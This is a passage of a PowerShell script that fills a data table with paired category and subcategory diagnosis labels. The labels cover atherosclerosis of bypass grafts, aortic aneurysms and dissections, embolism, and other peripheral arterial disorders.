ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration of other part of lower leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration","Atherosclerosis of autologous vein bypass graft(s) of the left leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of other extremity with ulceration","Atherosclerosis of autologous vein bypass graft(s) of other extremity with ulceration") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with gangrene","Atherosclerosis of autologous vein bypass graft(s) of the extremities with gangrene, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with gangrene","Atherosclerosis of autologous vein bypass graft(s) of the extremities with gangrene, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with gangrene","Atherosclerosis of autologous vein bypass graft(s) of the extremities with gangrene, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with gangrene","Atherosclerosis of autologous vein bypass graft(s) of the extremities with gangrene, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein bypass graft(s) of the extremities with gangrene","Atherosclerosis of autologous vein bypass graft(s) of the extremities with gangrene, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of autologous vein bypass graft(s) of the extremities","Other atherosclerosis of autologous vein bypass graft(s) of the extremities, right leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of autologous vein bypass graft(s) of the extremities","Other atherosclerosis of autologous vein bypass graft(s) of the extremities, left leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of autologous vein bypass graft(s) of the extremities","Other atherosclerosis of autologous vein bypass graft(s) of the extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of autologous vein bypass graft(s) of the extremities","Other atherosclerosis of autologous vein bypass graft(s) of the extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of autologous vein bypass graft(s) of the extremities","Other atherosclerosis of autologous vein bypass graft(s) of the extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of nonautologous biological bypass graft(s) of the extremities","Unspecified atherosclerosis of nonautologous biological bypass graft(s) of the extremities, right leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of nonautologous biological bypass graft(s) of the extremities","Unspecified atherosclerosis of nonautologous biological bypass graft(s) of the extremities, left leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of nonautologous biological bypass graft(s) of the extremities","Unspecified atherosclerosis of nonautologous biological bypass graft(s) of the extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of nonautologous biological bypass graft(s) of the extremities","Unspecified atherosclerosis of nonautologous biological bypass graft(s) of the extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of nonautologous biological bypass graft(s) of the extremities","Unspecified atherosclerosis of nonautologous biological bypass graft(s) of the extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities intermittent claudication","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with intermittent claudication, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities intermittent claudication","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with intermittent claudication, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities intermittent claudication","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with intermittent claudication, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities intermittent claudication","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with intermittent claudication, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities intermittent claudication","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with intermittent claudication, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with rest pain","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with rest pain, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with rest pain","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with rest pain, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with rest pain","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with rest pain, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with rest pain","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with rest pain, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with rest pain","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with rest pain, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration of other part of lower leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the right leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration of other part of lower leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of the left leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of other extremity with ulceration","Atherosclerosis of nonautologous biological bypass graft(s) of other extremity with ulceration") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with gangrene","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with gangrene, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with gangrene","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with gangrene, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with gangrene","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with gangrene, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with gangrene","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with gangrene, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with gangrene","Atherosclerosis of nonautologous biological bypass graft(s) of the extremities with gangrene, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of nonautologous biological bypass graft(s) of the extremities","Other atherosclerosis of nonautologous biological bypass graft(s) of the extremities, right leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of nonautologous biological bypass graft(s) of the extremities","Other atherosclerosis of nonautologous biological bypass graft(s) of the extremities, left leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of nonautologous biological bypass graft(s) of the extremities","Other atherosclerosis of nonautologous biological bypass graft(s) of the extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of nonautologous biological bypass graft(s) of the extremities","Other atherosclerosis of nonautologous biological bypass graft(s) of the extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of nonautologous biological bypass graft(s) of the extremities","Other atherosclerosis of nonautologous biological bypass graft(s) of the extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of nonbiological bypass graft(s) of the extremities","Unspecified atherosclerosis of nonbiological bypass graft(s) of the extremities, right leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of nonbiological bypass graft(s) of the extremities","Unspecified atherosclerosis of nonbiological bypass graft(s) of the extremities, left leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of nonbiological bypass graft(s) of the extremities","Unspecified atherosclerosis of nonbiological bypass graft(s) of the extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of nonbiological bypass graft(s) of the extremities","Unspecified atherosclerosis of nonbiological bypass graft(s) of the extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of nonbiological bypass graft(s) of the extremities","Unspecified atherosclerosis of nonbiological bypass graft(s) of the extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of nonbiological bypass graft(s) of the extremities with intermittent claudication, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of nonbiological bypass graft(s) of the extremities with intermittent claudication, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of nonbiological bypass graft(s) of the extremities with intermittent claudication, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of nonbiological bypass graft(s) of the extremities with intermittent claudication, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of nonbiological bypass graft(s) of the extremities with intermittent claudication, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with rest pain","Atherosclerosis of nonbiological bypass graft(s) of the extremities with rest pain, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with rest pain","Atherosclerosis of nonbiological bypass graft(s) of the extremities with rest pain, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with rest pain","Atherosclerosis of nonbiological bypass graft(s) of the extremities with rest pain, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with rest pain","Atherosclerosis of nonbiological bypass graft(s) of the extremities with rest pain, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with rest pain","Atherosclerosis of nonbiological bypass graft(s) of the extremities with rest pain, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration of other part of lower leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the right leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration of other part of lower leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration","Atherosclerosis of nonbiological bypass graft(s) of the left leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of other extremity with ulceration","Atherosclerosis of nonbiological bypass graft(s) of other extremity with ulceration") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with gangrene","Atherosclerosis of nonbiological bypass graft(s) of the extremities with gangrene, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with gangrene","Atherosclerosis of nonbiological bypass graft(s) of the extremities with gangrene, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with gangrene","Atherosclerosis of nonbiological bypass graft(s) of the extremities with gangrene, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with gangrene","Atherosclerosis of nonbiological bypass graft(s) of the extremities with gangrene, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonbiological bypass graft(s) of the extremities with gangrene","Atherosclerosis of nonbiological bypass graft(s) of the extremities with gangrene, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of nonbiological bypass graft(s) of the extremities","Other atherosclerosis of nonbiological bypass graft(s) of the extremities, right leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of nonbiological bypass graft(s) of the extremities","Other atherosclerosis of nonbiological bypass graft(s) of the extremities, left leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of nonbiological bypass graft(s) of the extremities","Other atherosclerosis of nonbiological bypass graft(s) of the extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of nonbiological bypass graft(s) of the extremities","Other atherosclerosis of nonbiological bypass graft(s) of the extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of nonbiological bypass graft(s) of the extremities","Other atherosclerosis of nonbiological bypass graft(s) of the extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of other type of bypass graft(s) of the extremities","Unspecified atherosclerosis of other type of bypass graft(s) of the extremities, right leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of other type of bypass graft(s) of the extremities","Unspecified atherosclerosis of other type of bypass graft(s) of the extremities, left leg") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of other type of bypass graft(s) of the extremities","Unspecified atherosclerosis of other type of bypass graft(s) of the extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of other type of bypass graft(s) of the extremities","Unspecified atherosclerosis of other type of bypass graft(s) of the extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Unspecified atherosclerosis of other type of bypass graft(s) of the extremities","Unspecified atherosclerosis of other type of bypass graft(s) of the extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of other type of bypass graft(s) of the extremities with intermittent claudication, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of other type of bypass graft(s) of the extremities with intermittent claudication, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of other type of bypass graft(s) of the extremities with intermittent claudication, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of other type of bypass graft(s) of the extremities with intermittent claudication, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with intermittent claudication","Atherosclerosis of other type of bypass graft(s) of the extremities with intermittent claudication, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with rest pain","Atherosclerosis of other type of bypass graft(s) of the extremities with rest pain, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with rest pain","Atherosclerosis of other type of bypass graft(s) of the extremities with rest pain, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with rest pain","Atherosclerosis of other type of bypass graft(s) of the extremities with rest pain, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with rest pain","Atherosclerosis of other type of bypass graft(s) of the extremities with rest pain, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with rest pain","Atherosclerosis of other type of bypass graft(s) of the extremities with rest pain, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration of other part of lower leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the right leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration of thigh") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration of calf") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration of ankle") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration of heel and midfoot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration of other part of foot") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration of other part of lower leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration","Atherosclerosis of other type of bypass graft(s) of the left leg with ulceration of unspecified site") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of other extremity with ulceration","Atherosclerosis of other type of bypass graft(s) of other extremity with ulceration") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with gangrene","Atherosclerosis of other type of bypass graft(s) of the extremities with gangrene, right leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with gangrene","Atherosclerosis of other type of bypass graft(s) of the extremities with gangrene, left leg") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with gangrene","Atherosclerosis of other type of bypass graft(s) of the extremities with gangrene, bilateral legs") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with gangrene","Atherosclerosis of other type of bypass graft(s) of the extremities with gangrene, other extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other type of bypass graft(s) of the extremities with gangrene","Atherosclerosis of other type of bypass graft(s) of the extremities with gangrene, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of other type of bypass graft(s) of the extremities","Other atherosclerosis of other type of bypass graft(s) of the extremities, right leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of other type of bypass graft(s) of the extremities","Other atherosclerosis of other type of bypass graft(s) of the extremities, left leg") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of other type of bypass graft(s) of the extremities","Other atherosclerosis of other type of bypass graft(s) of the extremities, bilateral legs") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of other type of bypass graft(s) of the extremities","Other atherosclerosis of other type of bypass graft(s) of the extremities, other extremity") + $null = $DiagnosisList.Rows.Add("Other atherosclerosis of other type of bypass graft(s) of the extremities","Other atherosclerosis of other type of bypass graft(s) of the extremities, unspecified extremity") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other arteries","Atherosclerosis of other arteries") + $null = $DiagnosisList.Rows.Add("Other and unspecified atherosclerosis","Unspecified atherosclerosis") + $null = $DiagnosisList.Rows.Add("Other and unspecified atherosclerosis","Generalized atherosclerosis") + $null = $DiagnosisList.Rows.Add("Other and unspecified atherosclerosis","Chronic total occlusion of artery of the extremities") + $null = $DiagnosisList.Rows.Add("Dissection of aorta","Dissection of unspecified site of aorta") + $null = $DiagnosisList.Rows.Add("Dissection of aorta","Dissection of thoracic aorta") + $null = $DiagnosisList.Rows.Add("Dissection of aorta","Dissection of abdominal aorta") + $null = $DiagnosisList.Rows.Add("Dissection of aorta","Dissection of thoracoabdominal aorta") + $null = $DiagnosisList.Rows.Add("Thoracic aortic aneurysm, ruptured","Thoracic aortic aneurysm, ruptured") + $null = $DiagnosisList.Rows.Add("Thoracic aortic aneurysm, without rupture","Thoracic aortic aneurysm, without rupture") + $null = $DiagnosisList.Rows.Add("Abdominal aortic aneurysm, ruptured","Abdominal aortic aneurysm, ruptured") + $null = $DiagnosisList.Rows.Add("Abdominal aortic aneurysm, without rupture","Abdominal aortic aneurysm, without rupture") + $null = $DiagnosisList.Rows.Add("Thoracoabdominal aortic aneurysm, ruptured","Thoracoabdominal aortic aneurysm, ruptured") + $null = $DiagnosisList.Rows.Add("Thoracoabdominal aortic aneurysm, without rupture","Thoracoabdominal aortic aneurysm, without rupture") + $null = $DiagnosisList.Rows.Add("Aortic aneurysm of unspecified site, ruptured","Aortic aneurysm of unspecified site, ruptured") + $null = $DiagnosisList.Rows.Add("Aortic aneurysm of unspecified site, without rupture","Aortic aneurysm of unspecified site, without rupture") + $null = $DiagnosisList.Rows.Add("Other aneurysm","Aneurysm of carotid artery") + $null = $DiagnosisList.Rows.Add("Other aneurysm","Aneurysm of artery of upper extremity") + $null = $DiagnosisList.Rows.Add("Other aneurysm","Aneurysm of renal artery") + $null = $DiagnosisList.Rows.Add("Other aneurysm","Aneurysm of iliac artery") + $null = $DiagnosisList.Rows.Add("Other aneurysm","Aneurysm of artery of lower extremity") + $null = $DiagnosisList.Rows.Add("Other aneurysm","Aneurysm of other precerebral arteries") + $null = $DiagnosisList.Rows.Add("Other aneurysm","Aneurysm of vertebral artery") + $null = $DiagnosisList.Rows.Add("Other aneurysm","Aneurysm of other specified arteries") + $null = $DiagnosisList.Rows.Add("Other aneurysm","Aneurysm of unspecified site") + $null = $DiagnosisList.Rows.Add("Raynaud's syndrome","Raynaud's syndrome without gangrene") + $null = $DiagnosisList.Rows.Add("Raynaud's syndrome","Raynaud's syndrome with gangrene") + $null = $DiagnosisList.Rows.Add("Thromboangiitis obliterans [Buerger's disease]","Thromboangiitis obliterans [Buerger's disease]") + $null = $DiagnosisList.Rows.Add("Other specified peripheral vascular diseases","Erythromelalgia") + $null = $DiagnosisList.Rows.Add("Other specified peripheral vascular diseases","Other specified peripheral vascular diseases") + $null = $DiagnosisList.Rows.Add("Peripheral vascular disease, unspecified","Peripheral vascular disease, unspecified") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of abdominal aorta","Saddle embolus of abdominal aorta") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of abdominal aorta","Other arterial embolism and thrombosis of abdominal aorta") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of other and unspecified parts of aorta","Embolism and thrombosis of unspecified parts of aorta") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of other and unspecified parts of aorta","Embolism and thrombosis of thoracic aorta") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of other and unspecified parts of aorta","Embolism and thrombosis of other parts of aorta") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of arteries of the upper extremities","Embolism and thrombosis of arteries of the upper extremities") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of arteries of the lower extremities","Embolism and thrombosis of arteries of the lower extremities") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of arteries of extremities, unspecified","Embolism and thrombosis of arteries of extremities, unspecified") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of iliac artery","Embolism and thrombosis of iliac artery") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of other arteries","Embolism and thrombosis of other arteries") + $null = $DiagnosisList.Rows.Add("Embolism and thrombosis of unspecified artery","Embolism and thrombosis of unspecified artery") + $null = $DiagnosisList.Rows.Add("Atheroembolism of upper extremity","Atheroembolism of right upper extremity") + $null = $DiagnosisList.Rows.Add("Atheroembolism of upper extremity","Atheroembolism of left upper extremity") + $null = $DiagnosisList.Rows.Add("Atheroembolism of upper extremity","Atheroembolism of bilateral upper extremities") + $null = $DiagnosisList.Rows.Add("Atheroembolism of upper extremity","Atheroembolism of unspecified upper extremity") + $null = $DiagnosisList.Rows.Add("Atheroembolism of lower extremity","Atheroembolism of right lower extremity") + $null = $DiagnosisList.Rows.Add("Atheroembolism of lower extremity","Atheroembolism of left lower extremity") + $null = $DiagnosisList.Rows.Add("Atheroembolism of lower extremity","Atheroembolism of bilateral lower extremities") + $null = $DiagnosisList.Rows.Add("Atheroembolism of lower extremity","Atheroembolism of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Atheroembolism of other sites","Atheroembolism of kidney") + $null = $DiagnosisList.Rows.Add("Atheroembolism of other sites","Atheroembolism of other site") + $null = $DiagnosisList.Rows.Add("Septic arterial embolism","Septic arterial embolism") + $null = $DiagnosisList.Rows.Add("Other disorders of arteries and arterioles","Arteriovenous fistula, acquired") + $null = $DiagnosisList.Rows.Add("Other disorders of arteries and arterioles","Stricture of artery") + $null = 